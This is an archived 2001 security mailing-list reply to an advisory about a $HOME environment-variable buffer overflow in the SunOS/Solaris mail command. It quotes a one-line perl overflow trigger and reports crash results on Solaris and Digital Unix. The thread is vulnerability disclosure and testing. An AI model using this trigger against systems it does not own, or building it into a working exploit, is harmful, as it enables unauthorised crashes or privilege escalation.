> On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote: > > $HOME buffer overflow in SunOS 5.8 x86 > > Systems affected: > > SunOS 5.8 x86 have not tested on other OSes > > Risk: Medium > > Date: 4 June 2001 > > > > Details: > > HOME=`perl -e 'print "A"x1100'` ; export HOME > > mail a > > CTL-C > > eip gets smashed with 0x41414141. > > > 0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME > 0:jpmeier@sol:/home/jpmeier> mail a > ^Cmail: Mail saved in dead.letter > 1:jpmeier@sol:/home/jpmeier> uname -a > SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10 > > > also tried larger buffers. > > > Solaris/sparc appears not vulnerable. Maybe its an x86 bug only Solaris 7/Sparc is vulnerable: [gwolf@sun gwolf]$ uname -a SunOS sun.mydomain.org 5.7 Generic_106541-16 sun4u sparc SUNW,Ultra-5_10 [gwolf@sun gwolf]$ HOME=`perl -e 'print "A"x1100'` ; export HOME [gwolf@sun gwolf]$ mail a ^Cmail: ERROR signal 10 mail: ERROR signal 10 mail: ERROR signal 10 mail: ERROR signal 10 mail: ERROR signal 10 (...) Digital Unix V4.0C is vulnerable: digital> uname -a OSF1 digital V4.0 564.32 alpha digital> setenv HOME `perl -e 'print "a"x1100'` Received disconnect: Command terminated on signal 6. [and I am logged out of the machine] I tested it also on OpenBSD 2.8/i386 and /sparc, RedHat Linux 6.1/alpha and Debian GNU/Linux 2.2r3/i386, and they are not vulnerable. ------------------------------------------------------------ Gunnar Wolf - gwolfat_private - (+52)5623-1119 Desarrollo y Admon. de Sistemas en Red - FES Iztacala - UNAM Departamento de Seguridad en Computo - DGSCA - UNAM ------------------------------------------------------------ Quidquid latine dictum sit, altum viditur.
This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 17:37:45 PDT